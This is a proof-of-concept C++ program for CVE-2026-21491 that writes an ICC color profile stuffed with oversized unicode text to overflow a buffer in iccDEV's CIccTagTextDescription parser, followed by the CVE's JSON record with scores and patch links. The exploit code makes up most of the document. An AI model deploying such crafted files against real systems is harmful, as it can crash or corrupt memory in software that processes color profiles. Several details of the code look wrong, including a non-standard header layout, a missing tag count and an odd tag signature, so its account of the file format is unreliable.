CVE-2026-21491

#include <iostream> #include <fstream> #include <vector> #include <cstring> // PoC for CVE-2026-21491: Unicode Buffer Overflow in CIccTagTextDescription // This PoC generates a malicious ICC profile with oversized unicode text #pragma pack(push, 1) struct ICCProfileHeader { char signature[4]; // 'acsp' uint32_t profile_size; uint32_t cmm_type; uint32_t profile_version; uint32_t profile_class; uint32_t color_space; uint32_t pcs; uint32_t creation_date[12]; char platform[4]; uint32_t flags; uint32_t device_manufacturer; uint32_t device_model; uint64_t device_attributes; uint32_t rendering_intent; uint32_t pcs_illuminant[3]; char creator[4]; uint32_t reserved[7]; }; struct ICCTagEntry { uint32_t signature; uint32_t offset; uint32_t size; }; // TextDescription tag structure vulnerable to overflow struct TextDescriptionData { uint32_t count; // Unicode text count uint16_t unicodeText[1024]; // Malicious oversized unicode text }; #pragma pack(pop) void create_malicious_icc_profile(const std::string& filename) { std::ofstream file(filename, std::ios::binary); if (!file.is_open()) { std::cerr << "Failed to create file" << std::endl; return; } // Create header ICCProfileHeader header = {}; memcpy(header.signature, "acsp", 4); header.profile_size = 4096; header.profile_version = 0x02400000; // Version 2.4 header.profile_class = 0x73636E72; // 'scnr' (display class) header.color_space = 0x52594742; // 'RGB ' header.pcs = 0x58595A20; // 'XYZ ' // Write header file.write(reinterpret_cast<char*>(&header), sizeof(header)); // Create TextDescription tag entry ICCTagEntry textDescTag = {}; textDescTag.signature = 0x74657363; // 'tesc' textDescription textDescTag.offset = sizeof(header) + sizeof(ICCTagEntry); textDescTag.size = sizeof(TextDescriptionData); // Write tag table file.write(reinterpret_cast<char*>(&textDescTag), sizeof(textDescTag)); // Create malicious TextDescription data TextDescriptionData textData = {}; // Set count to indicate large unicode string textData.count = 1024; // Fill with repeated 'A' characters (unicode) for (int i = 0; i < 1024; i++) { textData.unicodeText[i] = 0x0041; // 'A' in unicode } // Write malicious data - this should trigger buffer overflow file.write(reinterpret_cast<char*>(&textData), sizeof(textData)); file.close(); std::cout << "Malicious ICC profile created: " << filename << std::endl; std::cout << "This profile contains oversized unicode text to trigger CVE-2026-21491" << std::endl; } int main() { create_malicious_icc_profile("CVE-2026-21491.icc"); return 0; }

{"cve": {"id": "CVE-2026-21491", "sourceIdentifier": "[email protected]", "published": "2026-01-06T19:16:08.907", "lastModified": "2026-01-12T18:29:22.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in unicode buffer overflow in `CIccTagTextDescription`. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Una vulnerabilidad presente en versiones anteriores a la 2.3.1.2 afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. Resulta en un desbordamiento de búfer Unicode en 'CIccTagTextDescription'. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-193"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/396", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4pv4-4x2x-6j88", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}